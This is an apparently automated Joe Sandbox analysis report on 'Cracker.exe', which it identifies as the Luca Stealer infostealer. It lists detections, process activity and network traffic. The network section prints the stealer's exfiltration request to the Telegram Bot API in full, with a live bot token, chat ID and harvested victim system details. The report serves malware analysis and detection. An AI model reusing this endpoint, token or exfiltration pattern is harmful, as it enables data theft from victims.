Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Cracker.exe

Overview

General Information

Sample name:Cracker.exe
Analysis ID:1551915
MD5:0f8507a31b1a48f31f26321c9762a513
SHA1:283e32ff498f529b4d1d8e9d0fecb44b7a219758
SHA256:b0bfae6412f70f426f3cbb56091f5cc157821b591a3391f68ddead55479f93c8
Tags:exeuser-likeastar20
Infos:

Detection

Luca Stealer
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Luca Stealer
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses the Telegram API (likely for C&C communication)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Suricata IDS alerts with low severity for network traffic

Classification

Process Tree

  • System is w10x64
  • Cracker.exe (PID: 7528 cmdline: "C:\Users\user\Desktop\Cracker.exe" MD5: 0F8507A31B1A48F31F26321C9762A513)
    • powershell.exe (PID: 7920 cmdline: "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LucaStealerYara detected Luca StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    Process Memory Space: Cracker.exe PID: 7528JoeSecurity_LucaStealerYara detected Luca StealerJoe Security

      Sigma Signatures

      Sigma detected: Non Interactive PowerShell Process Spawned
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName", CommandLine: "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Cracker.exe", ParentImage: C:\Users\user\Desktop\Cracker.exe, ParentProcessId: 7528, ParentProcessName: Cracker.exe, ProcessCommandLine: "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName", ProcessId: 7920, ProcessName: powershell.exe

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-08T11:43:33.636300+010020229301A Network Trojan was detected172.202.163.200443192.168.2.849728TCP
      2024-11-08T11:44:12.186266+010020229301A Network Trojan was detected172.202.163.200443192.168.2.849733TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-08T11:44:11.715081+010020390091A Network Trojan was detected149.154.167.220443192.168.2.849732TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Multi AV Scanner detection for submitted file
      Source: Cracker.exeReversingLabs: Detection: 39%
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Machine Learning detection for sample
      Source: Cracker.exeJoe Sandbox ML: detected
      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49732 version: TLS 1.2
      Source: Cracker.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Roaming\Adobe\Jump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Roaming\Adobe\Acrobat\Jump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\Jump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Jump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Adobe\Jump to behavior

      Networking

      barindex
      Suricata IDS alerts for network traffic
      Source: Network trafficSuricata IDS: 2039009 - Severity 1 - ET MALWARE Win32/SaintStealer CnC Response : 149.154.167.220:443 -> 192.168.2.8:49732
      Uses the Telegram API (likely for C&C communication)
      Source: unknownDNS query: name: api.telegram.org
      Source: global trafficHTTP traffic detected: POST /bot6924568893:AAFJucbuZH8gWTMC3Nv_EZKmmqi4jI-5y04/sendDocument?chat_id=-4128830475&caption=%0A-%20IP%20Info%20-%0A%0AIP:%20173.254.250.90%0ACountry:%20United%20States%0ACity:%20Dallas%0APostal:%2075201%0AISP:%20Quadranet%20Enterprises%20LLC%20-%20A8100%0ATimezone:%20-06:00%0A%0A-%20PC%20Info%20-%0A%0AUsername:%20user%0AOS:%20Microsoft%20Windows%2010%20Pro%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20%0A%20%20%20%20-%203CYSMP%20(1280,%201024)%0AHWID:%207263582169614543%0ACurrent%20Language:%20English%20(United%20States)%0AFileLocation:%20C:\Users\user\Desktop\Cracker.exe%0AIs%20Elevated:%20true%0A%0A-%20Other%20Info%20-%0A%0AAntivirus:%20%0A%20%20%20%20-%20Windows%20Defender%0A%0A-%20Log%20Info%20-%0A%0A%0ABuild:_____%0A%0APasswords:%20%E2%9D%8C%0ACookies:%20%E2%9C%85%202%0AWallets:%20%E2%9D%8C%0AFiles:%20%E2%9C%85%2030%0ACredit%20Cards:%20%E2%9D%8C%0AServers%20FTP/SSH:%20%E2%9D%8C%0ADiscord%20Tokens:%20%E2%9D%8C%0AOthers:%20%E2%9D%8C&parse_mode=HTML HTTP/1.1content-type: multipart/form-data; boundary=0e61ded359bbe687-2ea147fd7a2bd3f9-546bdba41babde57-da840e621e2da961content-length: 936023accept: */*host: api.telegram.org
      Source: global trafficHTTP traffic detected: GET /?output=json HTTP/1.1accept: */*host: ipwho.is
      Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
      Source: unknownDNS query: name: ipwho.is
      Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.8:49728
      Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.8:49733
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /?output=json HTTP/1.1accept: */*host: ipwho.is
      Source: global trafficDNS traffic detected: DNS query: ipwho.is
      Source: global trafficDNS traffic detected: DNS query: api.telegram.org
      Source: unknownHTTP traffic detected: POST /bot6924568893:AAFJucbuZH8gWTMC3Nv_EZKmmqi4jI-5y04/sendDocument?chat_id=-4128830475&caption=%0A-%20IP%20Info%20-%0A%0AIP:%20173.254.250.90%0ACountry:%20United%20States%0ACity:%20Dallas%0APostal:%2075201%0AISP:%20Quadranet%20Enterprises%20LLC%20-%20A8100%0ATimezone:%20-06:00%0A%0A-%20PC%20Info%20-%0A%0AUsername:%20user%0AOS:%20Microsoft%20Windows%2010%20Pro%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20%0A%20%20%20%20-%203CYSMP%20(1280,%201024)%0AHWID:%207263582169614543%0ACurrent%20Language:%20English%20(United%20States)%0AFileLocation:%20C:\Users\user\Desktop\Cracker.exe%0AIs%20Elevated:%20true%0A%0A-%20Other%20Info%20-%0A%0AAntivirus:%20%0A%20%20%20%20-%20Windows%20Defender%0A%0A-%20Log%20Info%20-%0A%0A%0ABuild:_____%0A%0APasswords:%20%E2%9D%8C%0ACookies:%20%E2%9C%85%202%0AWallets:%20%E2%9D%8C%0AFiles:%20%E2%9C%85%2030%0ACredit%20Cards:%20%E2%9D%8C%0AServers%20FTP/SSH:%20%E2%9D%8C%0ADiscord%20Tokens:%20%E2%9D%8C%0AOthers:%20%E2%9D%8C&parse_mode=HTML HTTP/1.1content-type: multipart/form-data; boundary=0e61ded359bbe687-2ea147fd7a2bd3f9-546bdba41babde57-da840e621e2da961content-length: 936023accept: */*host: api.telegram.org
      Source: Cracker.exe, 00000000.00000003.1895935302.000002979312F000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
      Source: Cracker.exe, 00000000.00000003.1978384633.0000029794F44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6924568893:AAFJucbuZH8gWTMC3Nv_EZKmmqi4jI-5y04/sendDocument?chat_id=-412
      Source: Cracker.exe, 00000000.00000003.1895935302.000002979312F000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
      Source: Cracker.exe, 00000000.00000002.1979276829.00000297930A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ipwhois.io/flags/us.svg
      Source: Cracker.exe, 00000000.00000002.1979276829.00000297930A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ipwhois.io/flags/us.svgM
      Source: Cracker.exe, 00000000.00000003.1895935302.000002979312F000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
      Source: Cracker.exe, 00000000.00000003.1895935302.000002979312F000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
      Source: Cracker.exe, 00000000.00000003.1895935302.000002979312F000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.drString found in binary or memory: https://duckduckgo.com/ac/?q=
      Source: Cracker.exe, 00000000.00000003.1895935302.000002979312F000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
      Source: Cracker.exe, 00000000.00000003.1895935302.000002979312F000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
      Source: Cracker.exe, 00000000.00000003.1895935302.000002979312F000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.drString found in binary or memory: https://www.ecosia.org/newtab/
      Source: Cracker.exe, 00000000.00000003.1895935302.000002979312F000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49732 version: TLS 1.2
      Source: classification engineClassification label: mal92.troj.spyw.evad.winEXE@4/14@2/2
      Source: C:\Users\user\Desktop\Cracker.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\kz8kl7vh.default\key4.dbJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7928:120:WilError_03
      Source: C:\Users\user\Desktop\Cracker.exeFile created: C:\Users\user\AppData\Local\Temp\PeAx1cGearPUOxYmqJLOshcWh0wbHd\Jump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Processor
      Source: C:\Users\user\Desktop\Cracker.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: Cracker.exe, 00000000.00000003.1892504724.00000297930ED000.00000004.00000020.00020000.00000000.sdmp, Cracker.exe, 00000000.00000003.1892183886.0000029793107000.00000004.00000020.00020000.00000000.sdmp, Cracker.exe, 00000000.00000003.1894308027.0000029793114000.00000004.00000020.00020000.00000000.sdmp, Login Data.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
      Source: Cracker.exeReversingLabs: Detection: 39%
      Source: unknownProcess created: C:\Users\user\Desktop\Cracker.exe "C:\Users\user\Desktop\Cracker.exe"
      Source: C:\Users\user\Desktop\Cracker.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\Cracker.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"Jump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeSection loaded: rstrtmgr.dllJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeSection loaded: cryptnet.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
      Source: Cracker.exeStatic PE information: Image base 0x140000000 > 0x60000000
      Source: Cracker.exeStatic file information: File size 2269184 > 1048576
      Source: Cracker.exeStatic PE information: Raw size of UPX1 is bigger than: 0x100000 < 0x229600
      Source: Cracker.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: Cracker.exeStatic PE information: section name: UPX2
      Source: initial sampleStatic PE information: section name: UPX0
      Source: initial sampleStatic PE information: section name: UPX1
      Source: C:\Users\user\Desktop\Cracker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
